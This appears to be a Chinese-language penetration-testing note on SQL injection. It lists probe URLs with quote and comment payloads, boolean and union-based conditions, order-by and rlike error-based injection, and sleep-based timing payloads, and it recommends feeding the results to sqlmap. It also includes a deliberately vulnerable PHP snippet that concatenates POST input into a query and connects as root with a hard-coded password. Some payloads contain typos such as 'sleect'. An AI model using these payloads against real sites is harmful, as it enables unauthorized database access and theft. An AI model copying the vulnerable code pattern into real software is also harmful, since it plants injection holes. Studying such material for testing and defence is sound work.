http://e.com/1.php?id=1
http://e.com/1.php?id=1-- sd
http://e.com/1.php?id=aaa
http://e.com/1.php?id=aaa'-- sd
http://e.com/1.php?id=aaa
http://e.com/1.php?id=aaa' '
http://e.com/1.php?id=aaa'||'
http://e.com/1.php?id=aaa'%2b'
id=1 and 1=if(1=2,1,(select 1 union select 2))
id=1 and 1=if(1=1,1,(select 1 union select 2))
id=1 order by 1正常
id=1 order by 1, 错误
id=1 order by 1, 1正常
Content-Type: application/json 时:
可以尝试用 \u0027 代替单引号。
orderby 注入:
$con= mysql_connect("localhost","root","123456") or die();
mysql_select_db("burp");
$orderby = $_POST['orderby'];
$order= $_POST['order'];
$sql= "select * from `sql` order by".$orderby." ".$order;
echo $sql;
$res=mysql_query($sql);
echo"
";
echo"";while($rows =@mysql_fetch_array($res,MYSQL_ASSOC)){
echo $rows['new'];
}
echo"";?>
上面的代码 $orderby 和 $order 都存在注入
这里一般遇到order orderby 参数 我一般会这样来测
orderby=id,&order=asc
orderby=id,1&order=asc
所以可以这样来进行注入
,if(1=1,1,(select 1 union sleect 2))
,if(1=2,1,(select 1 union sleect 2))
然后就可以放进sqlmap 愉快的跑了。
order 参数同上。
下面说另外一种注入方法:
先列2个语句
mysql> select user from mysql.user where user='admin' order by user rlike char(40);
ERROR1139 (42000): Got error 'parentheses not balanced' fromregexp
mysql> select user from mysql.user where user='admin' order by user rlike 1;+-------+
| user |
+-------+
| admin |
+-------+
1 row in set (0.00 sec)
所以就可以构造这样的语句
orderby=id&order=rlike if(1=1,1,char(40))
orderby=id&order=rlike if(1=21,1,char(40))
或者 rlike (case when 1=1 then 1 else (select 1 union select 2)end)
跑数据就可以
rlike (case when 1=1 sqlinject then 1 else (select 1 union select 2)end)
最后也可以 使用sleep 来进行判断注入
orderby=sleep(1)&order=asc